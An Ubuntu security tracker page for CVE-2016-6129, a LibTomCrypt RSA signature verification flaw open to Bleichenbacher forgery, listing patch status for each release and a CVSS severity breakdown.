CVE-2016-6129
Published: 13 February 2017
The rsa_verify_hash_ex function in rsa_verify_hash.c in LibTomCrypt, as used in OP-TEE before 2.2.0, does not validate that the message length is equal to the ASN.1 encoded data length, which makes it easier for remote attackers to forge RSA signatures or public certificates by leveraging a Bleichenbacher signature forgery attack.
From the Ubuntu Security Team
It was discovered that LibTomCrypt incorrectly handled RSA signatures or public certificates. An attacker could possibly use this issue to make a Bleichenbacher signature forgery attack.
Notes
Author | Note |
---|---|
tyhicks | Per Debian's security tracker, the underlying issue looks to be in libtomcrypt |
Priority
Status
Package | Release | Status |
---|---|---|
libtomcrypt Launchpad, Ubuntu, Debian |
artful |
Ignored
(end of life)
|
bionic |
Not vulnerable
(1.17-8)
|
|
precise |
Released
(1.17-3.2+deb7u1ubuntu0.1)
|
|
trusty |
Released
(1.17-5ubuntu0.1)
|
|
upstream |
Needs triage
|
|
xenial |
Released
(1.17-7ubuntu0.1)
|
|
yakkety |
Ignored
(end of life)
|
|
zesty |
Ignored
(end of life)
|
Severity score breakdown
Parameter | Value |
---|---|
Base score | 7.5 |
Attack vector | Network |
Attack complexity | Low |
Privileges required | None |
User interaction | None |
Scope | Unchanged |
Confidentiality | None |
Integrity impact | High |
Availability impact | None |
Vector | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N |